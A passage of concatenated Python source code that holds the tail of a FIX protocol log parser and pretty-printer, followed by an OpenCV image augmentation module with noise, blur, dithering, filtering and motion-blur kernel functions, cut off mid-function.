'''Parses log file, returns list of tag values in list of tag value lines'''
with open(logfile, 'r') as f:
lines = f.readlines()
delim = self.get_delim(lines)
tagvalue_lines = []
for line in lines:
line = line.replace('\u2028447','') # Replaces this pesky unicode
strt_idx = line.find('8=FIX')
line=line[strt_idx:]
columns = line.split(delim)
tagvalue = []
for col in columns:
values = col.split('=')
if len(values) > 1: # This ignores all \n
tagvalue.append([values[0],values[1]])
tagvalue_lines.append(tagvalue)
return tagvalue_lines
def get_delim(self, lines):
'''Finds delimiter for given FIX messages'''
i = 0
delim = ''
while delim not in ['<SOH>',':',';','^',' ','|'] and i<10:
try:
if '<SOH>' in lines[i]:
delim = '<SOH>'
else:
delim_idx = lines[i].rfind('10=')
delim = lines[i][delim_idx-1]
except:
print("Error: couldn't find delimiter in line ", i)
i+=1
return delim
def prettyprint(self,tagvalue_lines):
'''Takes in levels, types and name for tags and values, prints output'''
for line in tagvalue_lines:
print() # Blank line
print('New message')
print('\t--- StandardHeader component')
line_with_level = self.get_level(line)
for tagvalue in line_with_level:
try:
key = tagvalue[0]
level = tagvalue[2]
keyname = self.fields[key][0]
if key == '35': # If message
try:
msg_name = self.messages[tagvalue[1]][0]
print(level*'\t'+' '+f'{keyname}({key}) = {msg_name}({tagvalue[1]})')
except KeyError:
print(f'No message name listed for 35 = {tagvalue[1]}')
print(level*'\t'+f'{keyname}({key}) = ({tagvalue[1]})')
else:
# Printing components
if tagvalue[3] == 'component':
if level <= 1: # Applicable to level 1 components only
level = 2
if len(tagvalue)>4:
print((level-1)*'\t'+f'--- {tagvalue[4]} component') # Component name
print((level-1)*'\t'+' '+f'{keyname}({key}) = {tagvalue[1]}')
# Printing groups
elif tagvalue[3] == 'numingrp':
print(level*'\t'+f'--- {tagvalue[4]} group') # Group name
print(level*'\t'+f'{keyname}({key}) = {tagvalue[1]}')
else:
print(level*'\t'+f'{keyname}({key}) = {tagvalue[1]}')
except:
print(f'key name not found for tag {key}')
self.level = 1 # reset level after every message
|
<filename>codes/dataops/opencv_transforms/opencv_transforms/extra_functional.py<gh_stars>1-10
# from __future__ import division
#import torch
import math
import random
import numpy as np
import cv2
#import numbers
#import types
#import collections
#import warnings
from .common import preserve_shape, preserve_type, preserve_channel_dim, _maybe_process_in_chunks, polar2z, norm_kernel
from .common import _cv2_str2interpolation, _cv2_interpolation2str, MAX_VALUES_BY_DTYPE
## Below are new augmentations not available in the original ~torchvision.transforms
@preserve_type
def perspective(img, fov=45, anglex=0, angley=0, anglez=0, shear=0,
translate=(0, 0), scale=(1, 1), resample='BILINEAR', fillcolor=(0, 0, 0)):
r"""
This function is partly referred to in
https://blog.csdn.net/dcrmg/article/details/80273818
"""
gray_scale = False
if len(img.shape) == 2:
gray_scale = True
img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
h, w, _ = img.shape
centery = h * 0.5
centerx = w * 0.5
alpha = math.radians(shear)
beta = math.radians(anglez)
lambda1 = scale[0]
lambda2 = scale[1]
tx = translate[0]
ty = translate[1]
sina = math.sin(alpha)
cosa = math.cos(alpha)
sinb = math.sin(beta)
cosb = math.cos(beta)
M00 = cosb * (lambda1 * cosa ** 2 + lambda2 * sina ** 2) - sinb * (lambda2 - lambda1) * sina * cosa
M01 = - sinb * (lambda1 * sina ** 2 + lambda2 * cosa ** 2) + cosb * (lambda2 - lambda1) * sina * cosa
M10 = sinb * (lambda1 * cosa ** 2 + lambda2 * sina ** 2) + cosb * (lambda2 - lambda1) * sina * cosa
M11 = + cosb * (lambda1 * sina ** 2 + lambda2 * cosa ** 2) + sinb * (lambda2 - lambda1) * sina * cosa
M02 = centerx - M00 * centerx - M01 * centery + tx
M12 = centery - M10 * centerx - M11 * centery + ty
affine_matrix = np.array([[M00, M01, M02], [M10, M11, M12], [0, 0, 1]], dtype=np.float32)
# -------------------------------------------------------------------------------
z = np.sqrt(w ** 2 + h ** 2) / 2 / np.tan(math.radians(fov / 2))
radx = math.radians(anglex)
rady = math.radians(angley)
sinx = math.sin(radx)
cosx = math.cos(radx)
siny = math.sin(rady)
cosy = math.cos(rady)
r = np.array([[cosy, 0, -siny, 0],
[-siny * sinx, cosx, -sinx * cosy, 0],
[cosx * siny, sinx, cosx * cosy, 0],
[0, 0, 0, 1]])
pcenter = np.array([centerx, centery, 0, 0], np.float32)
p1 = np.array([0, 0, 0, 0], np.float32) - pcenter
p2 = np.array([w, 0, 0, 0], np.float32) - pcenter
p3 = np.array([0, h, 0, 0], np.float32) - pcenter
p4 = np.array([w, h, 0, 0], np.float32) - pcenter
dst1 = r.dot(p1)
dst2 = r.dot(p2)
dst3 = r.dot(p3)
dst4 = r.dot(p4)
list_dst = [dst1, dst2, dst3, dst4]
org = np.array([[0, 0],
[w, 0],
[0, h],
[w, h]], np.float32)
dst = np.zeros((4, 2), np.float32)
for i in range(4):
dst[i, 0] = list_dst[i][0] * z / (z - list_dst[i][2]) + pcenter[0]
dst[i, 1] = list_dst[i][1] * z / (z - list_dst[i][2]) + pcenter[1]
perspective_matrix = cv2.getPerspectiveTransform(org, dst)
total_matrix = perspective_matrix @ affine_matrix
result_img = cv2.warpPerspective(img, total_matrix, (w, h), flags=_cv2_str2interpolation[resample],
borderMode=cv2.BORDER_CONSTANT, borderValue=fillcolor)
if gray_scale:
result_img = cv2.cvtColor(result_img, cv2.COLOR_RGB2GRAY)
return result_img
@preserve_type
def noise_gaussian(img: np.ndarray, mean=0.0, std=1.0, gtype='color'):
r"""Add OpenCV Gaussian noise (Additive) to the image.
Args:
img (numpy ndarray): Image to be augmented.
mean (float): Mean (“centre”) of the Gaussian distribution. Default=0.0
std (float): Standard deviation (spread or “width”) of the Gaussian distribution. Default=1.0
gtype ('str': ``color`` or ``bw``): Type of Gaussian noise to add, either colored or black and white.
Default='color' (Note: can introduce color noise during training)
Returns:
numpy ndarray: version of the image with Gaussian noise added.
"""
h,w,c = img.shape
if gtype == 'bw':
c = 1
gauss = np.random.normal(loc=mean, scale=std, size=(h,w,c)).astype(np.float32)
noisy = np.clip((1 + gauss) * img.astype(np.float32), 0, 255)
return noisy
@preserve_type
def noise_poisson(img):
r"""Add OpenCV Poisson noise to the image.
Important: Poisson noise is not additive like Gaussian, it's dependant on
the image values. Read: https://tomroelandts.com/articles/gaussian-noise-is-added-poisson-noise-is-applied
Args:
img (numpy ndarray): Image to be augmented.
Returns:
numpy ndarray: version of the image with Poisson noise added.
"""
img = img.astype(np.float32)/255.0
vals = len(np.unique(img))
vals = 2 ** np.ceil(np.log2(vals))
noisy = 255 * np.clip(np.random.poisson(img.astype(np.float32) * vals) / float(vals), 0, 1)
return noisy
@preserve_type
def noise_salt_and_pepper(img, prob=0.01):
r"""Adds "Salt & Pepper" noise to an image.
Args:
img (numpy ndarray): Image to be augmented.
prob (float): probability (threshold) that controls level of noise
Returns:
numpy ndarray: version of the image with Poisson noise added.
"""
#alt 1: black and white s&p
rnd = np.random.rand(img.shape[0], img.shape[1])
noisy = img.copy()
noisy[rnd < prob/2] = 0.0
noisy[rnd > 1 - prob/2] = 255.0
#alt 2: coming up as colored s&p
#randomize the amount of noise and the ratio between salt and pepper
# amount = np.random.uniform(0.02, 0.15)
# s_vs_p = np.random.uniform(0.3, 0.7) # average = 50% salt, 50% pepper #q
# noisy = np.copy(img)
# flipped = np.random.choice([True, False], size=noisy.shape, p=[amount, 1 - amount])
# # Salted mode
# salted = np.random.choice([True, False], size=noisy.shape, p=[s_vs_p, 1 - s_vs_p])
# # Pepper mode
# peppered = ~salted
# noisy[flipped & salted] = 1
return noisy
@preserve_type
def noise_speckle(img: np.ndarray, mean=0.0, std=1.0, gtype='color'):
r"""Add Speckle noise to the image.
Args:
img (numpy ndarray): Image to be augmented.
mean (float): Mean (“centre”) of the distribution. Default=0.0
std (float): Standard deviation (spread or “width”) of the distribution. Default=1.0
type ('str': ``color`` or ``bw``): Type of noise to add, either colored or black and white.
Default='color' (Note: can introduce color noise during training)
Returns:
numpy ndarray: version of the image with Speckle noise added.
"""
h,w,c = img.shape
if gtype == 'bw':
c = 1
speckle = np.random.normal(loc=mean, scale=std ** 0.5, size=(h,w,c)).astype(np.float32)
noisy = img + img * speckle
noisy = np.clip(noisy, 0, 255)
return noisy
@preserve_shape
@preserve_type
def compression(img: np.ndarray, quality=20, image_type='.jpeg'):
r"""Compress the image using OpenCV.
Args:
img (numpy ndarray): Image to be compressed.
quality (int: [0,100]): Compression quality for the image.
Lower values represent higher compression and lower
quality. Default=20
image_type (str): select between '.jpeg' or '.webp'
compression. Default='.jpeg'.
Returns:
numpy ndarray: version of the image with compression.
"""
if image_type in [".jpeg", ".jpg"]:
quality_flag = cv2.IMWRITE_JPEG_QUALITY
elif image_type == ".webp":
quality_flag = cv2.IMWRITE_WEBP_QUALITY
else:
NotImplementedError("Only '.jpg' and '.webp' compression transforms are implemented. ")
input_dtype = img.dtype
needs_float = False
if input_dtype == np.float32:
warn(
"Image compression augmentation "
"is most effective with uint8 inputs, "
"{} is used as input.".format(input_dtype),
UserWarning,
)
img = from_float(img, dtype=np.dtype("uint8"))
needs_float = True
elif input_dtype not in (np.uint8, np.float32):
raise TypeError("Unexpected dtype {} for compression augmentation".format(input_dtype))
#encoding parameters
encode_param = [int(quality_flag), quality]
# encode
is_success, encimg = cv2.imencode(image_type, img, encode_param)
# decode
compressed_img = cv2.imdecode(encimg, cv2.IMREAD_UNCHANGED)
if needs_float:
compressed_img = to_float(compressed_img, max_value=255)
return compressed_img
#Get a valid kernel for the blur operations
def valid_kernel(h: int, w: int, kernel_size: int):
#make sure the kernel size is smaller than the image dimensions
kernel_size = min(kernel_size,h,w)
#round up and cast to int
kernel_size = int(np.ceil(kernel_size))
#kernel size has to be an odd number
if kernel_size % 2 == 0:
kernel_size+=1
return kernel_size
@preserve_shape
@preserve_type
def average_blur(img: np.ndarray, kernel_size: int = 3):
r"""Blurs an image using OpenCV Gaussian Blur.
Args:
img (numpy ndarray): Image to be augmented.
kernel_size (int): size of the blur filter to use. Default: 3.
Returns:
numpy ndarray: version of the image with blur applied.
"""
h, w = img.shape[0:2]
#Get a valid kernel size
kernel_size = valid_kernel(h,w,kernel_size)
#Averaging Filter Blur (Homogeneous filter)
# blurred = cv2.blur(img, (kernel_size,kernel_size))
blur_fn = _maybe_process_in_chunks(cv2.blur, ksize=(kernel_size,kernel_size))
return blur_fn(img)
#Box blur and average blur should be the same
@preserve_shape
@preserve_type
def box_blur(img: np.ndarray, kernel_size: int = 3):
r"""Blurs an image using OpenCV Gaussian Blur.
Args:
img (numpy ndarray): Image to be augmented.
kernel_size (int): size of the blur filter to use. Default: 3.
Returns:
numpy ndarray: version of the image with blur applied.
"""
h, w = img.shape[0:2]
#Get a valid kernel size
kernel_size = valid_kernel(h,w,kernel_size)
#Box Filter Blur
# blurred = cv2.boxFilter(img,ddepth=-1,ksize=(kernel_size,kernel_size))
blur_fn = _maybe_process_in_chunks(cv2.boxFilter, ddepth=-1, ksize=(kernel_size,kernel_size))
return blur_fn(img)
@preserve_shape
@preserve_type
def gaussian_blur(img: np.ndarray, kernel_size: int = 3, sigma=0.0):
r"""Blurs an image using OpenCV Gaussian Blur.
Args:
img (numpy ndarray): Image to be augmented.
kernel_size (int): size of the blur filter to use. Default: 3.
Returns:
numpy ndarray: version of the image with blur applied.
Note: When sigma=0, it is computed as `sigma = 0.3*((kernel_size-1)*0.5 - 1) + 0.8`
"""
h, w = img.shape[0:2]
#Get a valid kernel size
kernel_size = valid_kernel(h,w,kernel_size)
#Gaussian Filter Blur
# blurred = cv2.GaussianBlur(img,(kernel_size,kernel_size),0)
blur_fn = _maybe_process_in_chunks(cv2.GaussianBlur, ksize=(kernel_size,kernel_size), sigmaX=sigma)
return blur_fn(img)
@preserve_shape
@preserve_type
def median_blur(img: np.ndarray, kernel_size: int = 3):
r"""Blurs an image using OpenCV Median Blur.
Args:
img (numpy ndarray): Image to be augmented.
kernel_size (int): size of the blur filter to use. Default: 3.
Returns:
numpy ndarray: version of the image with blur applied.
"""
h, w = img.shape[0:2]
#Get a valid kernel size
kernel_size = valid_kernel(h,w,kernel_size)
#Median Filter Blur
blur_fn = _maybe_process_in_chunks(cv2.medianBlur, ksize=kernel_size)
return blur_fn(img)
#Needs testing
@preserve_shape
@preserve_type
def bilateral_blur(img: np.ndarray, kernel_size: int = 3, sigmaColor: int = 5, sigmaSpace: int = 5):
r"""Blurs an image using OpenCV Gaussian Blur.
Args:
img (numpy ndarray): Image to be augmented.
kernel_size (int): size of the blur filter to use. Default: 3. Large filters
(d > 5) are very slow, so it is recommended to use d=5 for real-time
applications, and perhaps d=9 for offline applications that need heavy
noise filtering.
Sigma values: For simplicity, you can set the 2 sigma values to be the same.
If they are small (< 10), the filter will not have much effect, whereas
if they are large (> 150), they will have a very strong effect, making
the image look "cartoonish".
sigmaColor Filter sigma in the color space. A larger value of the parameter
means that farther colors within the pixel neighborhood (see sigmaSpace)
will be mixed together, resulting in larger areas of semi-equal color.
sigmaSpace Filter sigma in the coordinate space. A larger value of the parameter
means that farther pixels will influence each other as long as their colors
are close enough (see sigmaColor ). When d>0, it specifies the neighborhood
size regardless of sigmaSpace. Otherwise, d is proportional to sigmaSpace.
borderType border mode used to extrapolate pixels outside of the image
Returns:
numpy ndarray: version of the image with blur applied.
"""
h, w = img.shape[0:2]
#Get a valid kernel size
kernel_size = valid_kernel(h,w,kernel_size)
#Bilateral filter doesn't appear to work with kernel_size > 9, check
# if kernel_size > 9:
# kernel_size = 9
#Bilateral Filter
# blurred = cv2.bilateralFilter(img,kernel_size,sigmaColor,sigmaSpace)
blur_fn = _maybe_process_in_chunks(
cv2.bilateralFilter,
d=kernel_size,
sigmaColor=sigmaColor,
sigmaSpace=sigmaSpace)
return blur_fn(img)
@preserve_type
def km_quantize(img, K=8, single_rnd_color=False):
r""" Color quantization with CV2 K-Means clustering.
Color quantization is the process of reducing number of colors
in an image. Here we use k-means clustering for color
quantization. There are 3 features (R,G,B) in the images,
so they are reshaped to an array of Px3 size (P is number
of pixels in an image, M*N, where M=img.shape[1] and
N=img.shape[0]). And after the clustering, we apply centroid
values (it is also R,G,B) to all pixels, such that resulting
image will have specified number of colors. Finally, it's
reshaped back to the shape of the original image.
Args:
img (numpy ndarray): Image to be quantized.
Returns:
numpy ndarray: the quantized image.
"""
# reshape to (M*N, 3)
Z = img.reshape((-1,3))
# convert image to np.float32
Z = np.float32(Z)
# define criteria, number of clusters(K) and apply kmeans()
criteria = (
cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
ret, labels, centroids = cv2.kmeans(
Z, K, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
res = centroids[labels.flatten()]
return res.reshape((img.shape))
def simple_quantize(image, rgb_range):
r""" Simple image quantization nased on color ranges.
"""
pixel_range = 255. / rgb_range
image = image.astype(np.float32)
return (255.*(image*pixel_range/255.).clip(0, 255).round()/(pixel_range)).astype(np.uint8)
@preserve_type
def noise_dither_bayer(img: np.ndarray):
r"""Adds colored bayer dithering noise to the image.
Args:
img (numpy ndarray): Image to be dithered.
Returns:
numpy ndarray: version of the image with dithering applied.
"""
imgtype = img.dtype
size = img.shape
#Note: these are very slow for large images, must crop first before applying.
# Bayer works more or less. I think it's missing a part of the image, the
# dithering pattern is apparent, but the quantized (color palette) is not there.
# Still enough for models to learn dedithering
bayer_matrix = np.array([[0, 8, 2, 10], [12, 4, 14, 6], [3, 11, 1, 9], [15, 7, 13, 5]]) #/256 #4x4 Bayer matrix
bayer_matrix = bayer_matrix*16
red = img[:,:,2] #/255.
green = img[:,:,1] #/255.
blue = img[:,:,0] #/255.
img_split = np.zeros((img.shape[0], img.shape[1], 3), dtype = imgtype)
for values, color, channel in zip((red, green, blue), ('red', 'green', 'blue'), (2,1,0)):
for i in range(0, values.shape[0]):
for j in range(0, values.shape[1]):
x = np.mod(i, 4)
y = np.mod(j, 4)
if values[i, j] > bayer_matrix[x, y]:
img_split[i,j,channel] = 255 #1
dithered = img_split #*255.
return dithered
@preserve_type
def noise_dither_fs(img: np.ndarray, samplingF = 1):
r"""Adds colored Floyd-Steinberg dithering noise to the image.
Floyd–Steinberg dithering is an image dithering algorithm first published in
1976 by <NAME> and <NAME>. It is commonly used by image
manipulation software, for example when an image is converted into GIF format
that is restricted to a maximum of 256 colors.
The algorithm achieves dithering using error diffusion, meaning it pushes
(adds) the residual quantization error of a pixel onto its neighboring
pixels, to be dealt with later.
https://en.wikipedia.org/wiki/Floyd–Steinberg_dithering
Pseudocode:
for each y from top to bottom
for each x from left to right
oldpixel := pixel[x][y]
newpixel := find_closest_palette_color(oldpixel)
pixel[x][y] := newpixel
quant_error := oldpixel - newpixel
pixel[x+1][y ] := pixel[x+1][y ] + quant_error * 7/16
pixel[x-1][y+1] := pixel[x-1][y+1] + quant_error * 3/16
pixel[x ][y+1] := pixel[x ][y+1] + quant_error * 5/16
pixel[x+1][y+1] := pixel[x+1][y+1] + quant_error * 1/16
find_closest_palette_color(oldpixel) = floor(oldpixel / 256)
Args:
img (numpy ndarray): Image to be dithered.
samplingF: controls the amount of dithering
Returns:
numpy ndarray: version of the image with dithering applied.
"""
#for Floyd-Steinberg dithering noise
def minmax(v):
if v > 255:
v = 255
if v < 0:
v = 0
return v
size = img.shape
#Note: these are very slow for large images, must crop first before applying.
#Floyd-Steinberg
re_fs = img.copy()
samplingF = 1
for i in range(0, size[0]-1):
for j in range(1, size[1]-1):
oldPixel_b = re_fs[i, j, 0] #[y, x]
oldPixel_g = re_fs[i, j, 1] #[y, x]
oldPixel_r = re_fs[i, j, 2] #[y, x]
newPixel_b = np.round(samplingF * oldPixel_b/255.0) * (255/samplingF)
newPixel_g = np.round(samplingF * oldPixel_g/255.0) * (255/samplingF)
newPixel_r = np.round(samplingF * oldPixel_r/255.0) * (255/samplingF)
re_fs[i, j, 0] = newPixel_b
re_fs[i, j, 1] = newPixel_g
re_fs[i, j, 2] = newPixel_r
quant_error_b = oldPixel_b - newPixel_b
quant_error_g = oldPixel_g - newPixel_g
quant_error_r = oldPixel_r - newPixel_r
re_fs[i, j+1, 0] = minmax(re_fs[i, j+1, 0]+(7/16.0)*quant_error_b)
re_fs[i, j+1, 1] = minmax(re_fs[i, j+1, 1]+(7/16.0)*quant_error_g)
re_fs[i, j+1, 2] = minmax(re_fs[i, j+1, 2]+(7/16.0)*quant_error_r)
re_fs[i+1, j-1, 0] = minmax(re_fs[i+1, j-1, 0]+(3/16.0)*quant_error_b)
re_fs[i+1, j-1, 1] = minmax(re_fs[i+1, j-1, 1]+(3/16.0)*quant_error_g)
re_fs[i+1, j-1, 2] = minmax(re_fs[i+1, j-1, 2]+(3/16.0)*quant_error_r)
re_fs[i+1, j, 0] = minmax(re_fs[i+1, j, 0]+(5/16.0)*quant_error_b)
re_fs[i+1, j, 1] = minmax(re_fs[i+1, j, 1]+(5/16.0)*quant_error_g)
re_fs[i+1, j, 2] = minmax(re_fs[i+1, j, 2]+(5/16.0)*quant_error_r)
re_fs[i+1, j+1, 0] = minmax(re_fs[i+1, j+1, 0]+(1/16.0)*quant_error_b)
re_fs[i+1, j+1, 1] = minmax(re_fs[i+1, j+1, 1]+(1/16.0)*quant_error_g)
re_fs[i+1, j+1, 2] = minmax(re_fs[i+1, j+1, 2]+(1/16.0)*quant_error_r)
dithered = re_fs
return dithered
def noise_dither_avg_bw(img):
"""
https://github.com/QunixZ/Image_Dithering_Implements/blob/master/HW1.py
"""
if len(img.shape) > 2 and img.shape[2] != 1:
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
threshold = np.average(img)
re_aver = np.where(img < threshold, 0, 255).astype(np.uint8)
#re_aver = cv2.cvtColor(re_aver,cv2.COLOR_GRAY2RGB)
return re_aver
def noise_dither_bayer_bw(img):
"""
https://github.com/QunixZ/Image_Dithering_Implements/blob/master/HW1.py
"""
if len(img.shape) > 2 and img.shape[2] != 1:
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
size = img.shape
re_bayer = np.zeros(size, dtype=np.uint8) #this dtype may be wrong if images in range (0,1)
bayer_matrix = np.array([[0, 8, 2, 10], [12, 4, 14, 6], [3, 11, 1, 9], [15, 7, 13, 5]]) #4x4 Bayer matrix
bayer_matrix = bayer_matrix*16
for i in range(0, size[0]):
for j in range(0, size[1]):
x = np.mod(i, 4)
y = np.mod(j, 4)
if img[i, j] > bayer_matrix[x, y]:
re_bayer[i, j] = 255
#re_bayer = cv2.cvtColor(re_bayer,cv2.COLOR_GRAY2RGB)
return re_bayer
def noise_dither_bin_bw(img):
"""
https://github.com/QunixZ/Image_Dithering_Implements/blob/master/HW1.py
"""
if len(img.shape) > 2 and img.shape[2] != 1:
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
img_bw = np.where(img < 127, 0, 255).astype(np.uint8)
#img_bw = cv2.cvtColor(img_bw,cv2.COLOR_GRAY2RGB)
return img_bw
def noise_dither_fs_bw(img, samplingF = 1):
"""
https://github.com/QunixZ/Image_Dithering_Implements/blob/master/HW1.py
"""
#for Floyd-Steinberg dithering noise
def minmax(v):
if v > 255:
v = 255
if v < 0:
v = 0
return v
if len(img.shape) > 2 and img.shape[2] != 1:
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
size = img.shape
re_fs = img
for i in range(0, size[0]-1):
for j in range(1, size[1]-1):
oldPixel = re_fs[i, j] #[y, x]
newPixel = np.round(samplingF * oldPixel/255.0) * (255/samplingF)
re_fs[i, j] = newPixel
quant_error = oldPixel - newPixel
re_fs[i, j+1] = minmax(re_fs[i, j+1]+(7/16.0)*quant_error)
re_fs[i+1, j-1] = minmax(re_fs[i+1, j-1]+(3/16.0)*quant_error)
re_fs[i+1, j] = minmax(re_fs[i+1, j]+(5/16.0)*quant_error)
re_fs[i+1, j+1] = minmax(re_fs[i+1, j+1]+(1/16.0)*quant_error)
#re_fs = cv2.cvtColor(re_fs,cv2.COLOR_GRAY2RGB)
return re_fs
def noise_dither_random_bw(img):
if len(img.shape) > 2 and img.shape[2] != 1:
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
size = img.shape
re_rand = np.zeros(size, dtype=np.uint8) #this dtype may be wrong if images in range (0,1)
for i in range(0, size[0]):
for j in range(0, size[1]):
if img[i, j] < np.random.uniform(0, 256):
re_rand[i, j] = 0
else:
re_rand[i, j] = 255
#re_rand = cv2.cvtColor(re_rand,cv2.COLOR_GRAY2RGB)
return re_rand
#translate_chan()
#TBD
def filter_max_rgb(img: np.ndarray):
r"""The Max RGB filter is used to visualize which channel
contributes most to a given area of an image.
Can be used for simple color-based segmentation.
More infotmation on: https://www.pyimagesearch.com/2015/09/28/implementing-the-max-rgb-filter-in-opencv/
Args:
img (numpy ndarray): Image to be filtered.
Returns:
numpy ndarray: version of the image after Max RGB filter.
"""
# split the image into its BGR components
(B, G, R) = cv2.split(img)
# find the maximum pixel intensity values for each
# (x, y)-coordinate,, then set all pixel values less
# than M to zero
M = np.maximum(np.maximum(R, G), B)
R[R < M] = 0
G[G < M] = 0
B[B < M] = 0
# merge the channels back together and return the image
return cv2.merge([B, G, R])
@preserve_type
def filter_colorbalance(img: np.ndarray, percent=1):
r"""Simple color balance algorithm (similar to Photoshop "auto levels")
More infotmation on:
https://gist.github.com/DavidYKay/9dad6c4ab0d8d7dbf3dc#gistcomment-3025656
http://www.morethantechnical.com/2015/01/14/simplest-color-balance-with-opencv-wcode/
https://web.stanford.edu/~sujason/ColorBalancing/simplestcb.html
Args:
img (numpy ndarray): Image to be filtered.
percent (int): amount of balance to apply
Returns:
numpy ndarray: version of the image after Simple Color Balance filter.
"""
out_channels = []
cumstops = (
img.shape[0] * img.shape[1] * percent / 200.0,
img.shape[0] * img.shape[1] * (1 - percent / 200.0)
)
for channel in cv2.split(img):
channel = channel.astype(np.uint8)
cumhist = np.cumsum(cv2.calcHist([channel], [0], None, [256], (0,256)))
low_cut, high_cut = np.searchsorted(cumhist, cumstops)
lut = np.concatenate((
np.zeros(low_cut),
np.around(np.linspace(0, 255, high_cut - low_cut + 1)),
255 * np.ones(255 - high_cut)
))
out_channels.append(cv2.LUT(channel, lut.astype('uint8')))
return cv2.merge(out_channels)
@preserve_shape
@preserve_type
def filter_unsharp(img: np.ndarray, blur_algo='median', kernel_size=None, strength=0.3, unsharp_algo='laplacian'):
r"""Unsharp mask filter, used to sharpen images to make edges and interfaces look crisper.
More infotmation on:
https://www.idtools.com.au/unsharp-masking-python-opencv/
Args:
img (numpy ndarray): Image to be filtered.
blur_algo (str: 'median' or None): blur algorithm to use if using laplacian (LoG) filter. Default: 'median'
strength (float: [0,1]): strength of the filter to be applied. Default: 0.3 (30%)
unsharp_algo (str: 'DoG' or 'laplacian'): selection of algorithm between LoG and DoG. Default: 'laplacian'
Returns:
numpy ndarray: version of the image after Unsharp Mask.
"""
#can randomize strength from 0.5 to 0.8
# if strength is None:
# strength = np.random.uniform(0.3, 0.9)
if unsharp_algo == 'DoG':
# If using Difference of Gauss (DoG)
# run a 5x5 gaussian blur then a 3x3 gaussian blur
blur5 = gaussian_blur(img.astype(np.float32), 5)
blur3 = gaussian_blur(img.astype(np.float32), 3)
DoGim = blur5 - blur3
img_out = img - strength*DoGim
img_out = img_out.astype(np.uint8)
else:
# 'laplacian': using LoG (actually, median blur instead of gaussian)
#randomize kernel_size between 1, 3 and 5
if kernel_size is None:
kernel_sizes = [1, 3, 5] #TODO: ks 5 is causing errors
kernel_size = random.choice(kernel_sizes)
# Median filtering (could be Gaussian for proper LoG)
#gray_image_mf = median_filter(gray_image, 1)
if blur_algo == 'median':
smooth = median_blur(img.astype(np.uint8), kernel_size)
# Calculate the Laplacian
# (LoG, or in this case, Laplacian of Median)
lap = cv2.Laplacian(smooth, cv2.CV_64F)
if len(lap.shape) == 2:
lap = lap.reshape(lap.shape[0], lap.shape[1], 1)
# Calculate the sharpened image
img_out = img - strength*lap
# Saturate the pixels in either direction
img_out[img_out>255] = 255
img_out[img_out<0] = 0
return img_out
def binarize(img, threshold):
r"""Binarize operation (ie. for edge detectors)
Args:
threshold: threshold value for binarize option
"""
#img = img > threshold
img[img < threshold] = 0.
return img
@preserve_shape
@preserve_type
def filter_canny(img: np.ndarray, sigma:float=0.33,
bin_thresh:bool=False, threshold:int=127, to_rgb:bool=False):
r"""Automatic Canny filter for edge detection
Args:
img: Image to be filtered.
sigma: standard deviation from the median to automatically calculate minimun
values and maximum values thresholds. Default: 0.33.
bin_thresh: flag to apply binarize (threshold) operation
Returns:
numpy ndarray: version of the image after Canny filter.
"""
if len(img.shape) > 2 and img.shape[2] != 1:
to_rgb = True
# compute the median of the single channel pixel intensities
median = np.median(img)
# apply automatic Canny edge detection using the computed median
minVal = int(max(0, (1.0 - sigma) * median))
maxVal = int(min(255, (1.0 + sigma) * median))
edged = cv2.Canny(img, minVal, maxVal)
if bin_thresh:
edged = binarize(edged, threshold)
if to_rgb:
edged = cv2.cvtColor(edged, cv2.COLOR_GRAY2RGB)
# return the edged image
return edged
def simple_motion_kernel(kernel_size):
kernel = np.zeros((kernel_size, kernel_size), dtype=np.uint8)
# get random points to draw
xs, xe = random.randint(0, kernel_size - 1), random.randint(0, kernel_size - 1)
if xs == xe:
ys, ye = random.sample(range(kernel_size), 2)
else:
ys, ye = random.randint(0, kernel_size - 1), random.randint(0, kernel_size - 1)
# draw motion path
cv2.line(kernel, (xs, ys), (xe, ye), 1, thickness=1)
# normalize kernel
return norm_kernel(kernel)
def complex_motion_kernel(SIZE, SIZEx2, DIAGONAL,
COMPLEXITY: float=0, eps: float=0.1):
"""
Get a kernel (psf) of given complexity.
Adapted from: https://github.com/LeviBorodenko/motionblur
"""
# generate the path
motion_path = create_motion_path(
DIAGONAL, SIZEx2, COMPLEXITY, eps)
# initialize an array with super-sized dimensions
kernel = np.zeros(SIZEx2, dtype=np.uint8)
# convert path values to int32 NumPy array (needed for cv2.polylines)
pts = np.array(motion_path).astype(np.int32)
pts = pts.reshape((-1,1,2))
# draw the path using polygon lines
kernel = cv2.polylines(kernel,
[pts], #motion_path, #
isClosed=False,
color=(64, 64, 64),
thickness=int(DIAGONAL / 150), #=3,
lineType=cv2.LINE_AA)
# applying gaussian blur for realism
# kernel_size = (2*radius)-1
# for now added 2* that and sigmas = 30, lines are coming up aliased
kernel_size = 2*(int(DIAGONAL * 0.01)*2)-1
kernel = cv2.GaussianBlur(
kernel,
(kernel_size, kernel_size),
sigmaX=30.0,
sigmaY=30.0,
borderType=0)
# resize to actual size
# Note: CV2 resize is faster, but has no antialias
# kernel = resize(kernel,
# out_shape=SIZE,
# interpolation="gaussian", #"lanczos2", #lanczos3
# antialiasing=True)
kernel = cv2.resize(kernel,
dsize=SIZE,
#fx=scale,
#fy=scale,
interpolation=cv2.INTER_CUBIC)
# normalize kernel, so it suns up to 1
return norm_kernel(kernel)
def create_motion_path(DIAGONAL, SIZEx2, COMPLEXITY, eps):
"""
creates a motion blur path with the given complexity.
Proceed in 5 steps:
1. get a random number of random step sizes
2. for each step get a random angle
3. combine steps and angles into a sequence of increments
4. create path out of increments
5. translate path to fit the kernel dimensions
NOTE: "random" means random but might depend on the given
complexity
"""
# first find the lengths of the motion blur steps
def getSteps():
"""
Calculate the length of the steps taken by the motion blur
A higher complexity lead to a longer total motion
blur path and more varied steps along the way.
Hence we sample:
MAX_PATH_LEN =[U(0,1) + U(0, complexity^2)] * diagonal * 0.75
and each step is:
beta(1, 30) * (1 - COMPLEXITY + eps) * diagonal)
"""
# getting max length of blur motion
MAX_PATH_LEN = 0.75 * DIAGONAL * \
(np.random.uniform() + np.random.uniform(0, COMPLEXITY**2))
# getting step
steps = []
while sum(steps) < MAX_PATH_LEN:
# sample next step
